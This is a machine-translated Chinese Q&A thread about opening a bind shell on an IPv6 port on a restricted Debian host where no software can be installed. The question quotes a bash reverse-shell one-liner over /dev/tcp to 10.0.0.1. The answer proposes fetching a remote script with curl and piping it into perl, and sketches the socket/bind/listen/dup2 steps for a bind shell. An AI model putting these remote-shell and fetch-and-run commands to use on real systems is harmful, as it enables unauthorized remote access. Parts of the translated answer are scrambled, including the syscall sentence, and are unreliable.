我希望能够监听 IPV6 地址上的端口(最终创建绑定 shell)。
我尝试使用安装在我尝试绑定的 linux (debian) 机器上的 netcat。遗憾的是,它似乎只绑定到 IPV4 TCP 端口,而不绑定到 IPV6。 (这是旧版本的netcat,不支持IPV6)
我知道反向 shell 存在类似的方法,我想知道是否有类似的方法适合我的情况?
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
有一些规则我无能为力:
我无法安装额外的应用程序,无法更新,也无法自行创建应用程序。
答案1
不。读:/dev/tcp 监听而不是 nc 监听。
如果没有更多信息,您可以使用系统版本的 perl,它是 Debian 中的必备软件包。编写一个单文件 perl 脚本。您几乎肯定可以找到一种方法来执行单文件脚本,而无需它作为应用程序存在于目标系统上,例如curl https://dropbox.com/.../script.pl | perl。该脚本将在ing 原始 fd之前使用系统调用socket(), bind(), listen(),dup2()来替换 stdin 和 stdout , 和。close()exec()
pythonstandard如果您安装了 Debian 软件包,那么编程会更好。
显然,如果您安装了,inetd您可以使用自己的配置文件运行它。如果您不介意使用 SSH 并且sshd已安装,那么就可以使用它。它肯定比任何其他选项更安全:-P。读:是否可以以普通用户身份运行 sshd?